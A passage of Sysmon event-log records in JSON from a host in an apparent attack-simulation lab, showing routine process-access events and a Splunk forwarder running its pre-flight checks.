06:49:17.224","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1867,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.224\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-106D-5F25-0000-0010A6C60300}\r\nTargetProcessId: 3908\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.224","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-106D-5F25-0000-0010A6C60300}","TargetProcessId":"3908","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1868,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.230\r\nProcessGuid: {E2A3D6B1-106D-5F25-0000-001067C70300}\r\nProcessId: 3896\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nFileVersion: 8.0.2\r\nDescription: splunk Application\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt \r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3\r\nParentProcessGuid: {E2A3D6B1-106D-5F25-0000-0010A6C60300}\r\nParentProcessId: 3908\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal pre-flight-checks --answer-yes --no-prompt 2>&1","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.230","ProcessGuid":"{E2A3D6B1-106D-5F25-0000-001067C70300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","FileVersion":"8.0.2","Description":"splunk Application","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3","ParentProcessGuid":"{E2A3D6B1-106D-5F25-0000-0010A6C60300}","ParentProcessId":"3908","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal pre-flight-checks --answer-yes --no-prompt 2&gt;&amp;1","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1869,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.224\r\nSourceProcessGUID: {E2A3D6B1-106D-5F25-0000-0010A6C60300}\r\nSourceProcessId: 3908\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {E2A3D6B1-106D-5F25-0000-001067C70300}\r\nTargetProcessId: 3896\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.224","SourceProcessGUID":"{E2A3D6B1-106D-5F25-0000-0010A6C60300}","SourceProcessId":"3908","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{E2A3D6B1-106D-5F25-0000-001067C70300}","TargetProcessId":"3896","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1870,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.224\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-106D-5F25-0000-001067C70300}\r\nTargetProcessId: 3896\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.224","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-106D-5F25-0000-001067C70300}","TargetProcessId":"3896","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1871,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.224\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.224","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1872,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.224\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.224","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1873,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.224\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.224","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1874,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.224\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.224","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1875,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.224\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 